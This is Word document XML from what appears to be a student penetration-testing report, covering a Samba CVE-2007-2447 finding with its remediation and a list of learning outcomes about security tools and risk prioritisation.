    <w:p w14:paraId="4CBAC9BD" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="165"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CVE: CVE-2007-2447 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DA40DC" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="162"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F712A9" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="165"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Risk: High (Could allow remote code execution) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2893B5F6" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="162"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B86CAB" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="165"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Affected Versions: Samba 3.0.0 to 3.0.24 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2DAED7" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26995C54" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="166"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6477BD68" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="161"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60AA3624" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="163"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEBEA7A" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="165"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Update Samba to 3.5.1 or later. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018F3DA4" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="163"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3C5EAB" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="165"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Disable LSA interfaces if not needed. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A08B8C2" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="162"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA4F2C6" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="165"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Isolate Samba from untrusted networks. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420258FE" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1CD18D" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="161"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA000CA" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="291"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Reference:https://www.samba.org/samba/security/CVE-2007-2447.html</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784B14E1" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="26"/>
        <w:ind w:left="-5" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">MAJOR GUIDENCE FROM THESE </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>PROJECT :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736CF139" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="161"/>
        <w:ind w:right="47" w:hanging="229"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Understanding Real-World Attack Vectors </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356F10B8" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="165"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Learn how </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>attackers</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>recon</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>scan</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> systems. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E123D0" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="165"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Gain hands-on experience with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>common vulnerabilities</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (e.g., SMB, RDP, outdated software). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5827822E" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="193"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Understand how </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>public exploits (CVE-based)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> are used in real scenarios. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBA1193" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="197"/>
        <w:ind w:left="-5" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsia="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:color w:val="F03A17"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>You think like an attacker, which helps you defend better.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43412B2A" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="-1" w:right="5"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63CD8B41" wp14:editId="5F641E05">
                <wp:extent cx="5733796" cy="19685"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="7788" name="Group 7788"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5733796" cy="19685"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5733796" cy="19685"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="8470" name="Shape 8470"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>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71" name="Shape 8471"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="318"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72" name="Shape 8472"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3493" y="63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73" name="Shape 8473"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5730621"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74" name="Shape 8474"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="318"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75" name="Shape 8475"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5730621" y="381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76" name="Shape 8476"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="318"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77" name="Shape 8477"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3493" y="1651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78" name="Shape 8478"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5730621"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788" style="width:451.48pt;height:1.54999pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="57337,196">
                <v:shape id="Shape 8479" style="position:absolute;width:57308;height:190;left:0;top:0;" coordsize="5730875,19050" path="m0,0l5730875,0l5730875,19050l0,19050l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#a0a0a0"/>
                </v:shape>
                <v:shape id="Shape 8480" style="position:absolute;width:91;height:91;left:3;top:6;" coordsize="9144,9144" path="m0,0l9144,0l9144,9144l0,9144l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#a0a0a0"/>
                </v:shape>
                <v:shape id="Shape 8481" style="position:absolute;width:57270;height:91;left:34;top:6;" coordsize="5727066,9144" path="m0,0l5727066,0l5727066,9144l0,9144l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#a0a0a0"/>
                </v:shape>
                <v:shape id="Shape 8482" style="position:absolute;width:91;height:91;left:57306;top:6;" coordsize="9144,9144" path="m0,0l9144,0l9144,9144l0,9144l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#a0a0a0"/>
                </v:shape>
                <v:shape id="Shape 8483" style="position:absolute;width:91;height:127;left:3;top:38;" coordsize="9144,12700" path="m0,0l9144,0l9144,12700l0,12700l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#a0a0a0"/>
                </v:shape>
                <v:shape id="Shape 8484" style="position:absolute;width:91;height:127;left:57306;top:38;" coordsize="9144,12700" path="m0,0l9144,0l9144,12700l0,12700l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#e3e3e3"/>
                </v:shape>
                <v:shape id="Shape 8485" style="position:absolute;width:91;height:91;left:3;top:165;" coordsize="9144,9144" path="m0,0l9144,0l9144,9144l0,9144l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#e3e3e3"/>
                </v:shape>
                <v:shape id="Shape 8486" style="position:absolute;width:57270;height:91;left:34;top:165;" coordsize="5727066,9144" path="m0,0l5727066,0l5727066,9144l0,9144l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#e3e3e3"/>
                </v:shape>
                <v:shape id="Shape 8487" style="position:absolute;width:91;height:91;left:57306;top:165;" coordsize="9144,9144" path="m0,0l9144,0l9144,9144l0,9144l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#e3e3e3"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3621C05A" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="161"/>
        <w:ind w:right="47" w:hanging="229"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Exposure to Security Tools and Techniques </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DD0B38" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="161"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Master industry-standard tools like </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Nmap, Metasploit, Burp Suite, Nessus, Wireshark</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06044AF9" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="165"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Learn how to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>chain tools together</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to create a full attack pipeline. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBCEDF3" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="195"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use scripting and automation to speed up discovery and exploitation. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040165AA" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="197"/>
        <w:ind w:left="-5" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsia="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:color w:val="F03A17"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>You get practical exposure, not just theory.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A5CAE7" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="-1" w:right="5"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EE084C1" wp14:editId="265198E9">
                <wp:extent cx="5733796" cy="20320"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="7791" name="Group 7791"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5733796" cy="20320"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5733796" cy="20320"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="8490" name="Shape 8490"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>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91" name="Shape 8491"/>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92" name="Shape 8492"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3493" y="127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93" name="Shape 8493"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5730621"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94" name="Shape 8494"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="318"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495" name="Shape 8495"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5730621" y="444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96" name="Shape 8496"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="31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97" name="Shape 8497"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3493" y="1714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498" name="Shape 8498"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5730621"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791" style="width:451.48pt;height:1.60001pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="57337,203">
                <v:shape id="Shape 8499" style="position:absolute;width:57308;height:190;left:0;top:0;" coordsize="5730875,19050" path="m0,0l5730875,0l5730875,19050l0,19050l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#a0a0a0"/>
                </v:shape>
                <v:shape id="Shape 8500" style="position:absolute;width:91;height:91;left:3;top:12;" coordsize="9144,9144" path="m0,0l9144,0l9144,9144l0,9144l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#a0a0a0"/>
                </v:shape>
                <v:shape id="Shape 8501" style="position:absolute;width:57270;height:91;left:34;top:12;" coordsize="5727066,9144" path="m0,0l5727066,0l5727066,9144l0,9144l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#a0a0a0"/>
                </v:shape>
                <v:shape id="Shape 8502" style="position:absolute;width:91;height:91;left:57306;top:12;" coordsize="9144,9144" path="m0,0l9144,0l9144,9144l0,9144l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#a0a0a0"/>
                </v:shape>
                <v:shape id="Shape 8503" style="position:absolute;width:91;height:127;left:3;top:44;" coordsize="9144,12700" path="m0,0l9144,0l9144,12700l0,12700l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#a0a0a0"/>
                </v:shape>
                <v:shape id="Shape 8504" style="position:absolute;width:91;height:127;left:57306;top:44;" coordsize="9144,12700" path="m0,0l9144,0l9144,12700l0,12700l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#e3e3e3"/>
                </v:shape>
                <v:shape id="Shape 8505" style="position:absolute;width:91;height:91;left:3;top:171;" coordsize="9144,9144" path="m0,0l9144,0l9144,9144l0,9144l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#e3e3e3"/>
                </v:shape>
                <v:shape id="Shape 8506" style="position:absolute;width:57270;height:91;left:34;top:171;" coordsize="5727066,9144" path="m0,0l5727066,0l5727066,9144l0,9144l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#e3e3e3"/>
                </v:shape>
                <v:shape id="Shape 8507" style="position:absolute;width:91;height:91;left:57306;top:171;" coordsize="9144,9144" path="m0,0l9144,0l9144,9144l0,9144l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#e3e3e3"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2765D6D6" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="161"/>
        <w:ind w:right="47" w:hanging="229"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Risk Identification and Prioritization </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EF9E32" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="161"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Learn to differentiate between </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>low, medium, high, and critical risks</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B949E75" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="165"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apply frameworks like </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CVSS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to quantify risk. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8FD47B" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="188"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Understand </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>business impact</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of technical vulnerabilities. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD754C5" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="197"/>
        <w:ind w:left="-5" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsia="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:color w:val="F03A17"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>You bridge the gap between technical findings and business consequences.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDBB420" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="-1" w:right="5"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2363F059" wp14:editId="4C0847AB">
                <wp:extent cx="5733796" cy="20955"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="7796" name="Group 7796"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5733796" cy="20955"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5733796" cy="20955"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="8510" name="Shape 8510"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>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11" name="Shape 8511"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="318"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12" name="Shape 8512"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3493" y="1905"/>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13" name="Shape 8513"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5730621" y="1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14" name="Shape 8514"/>
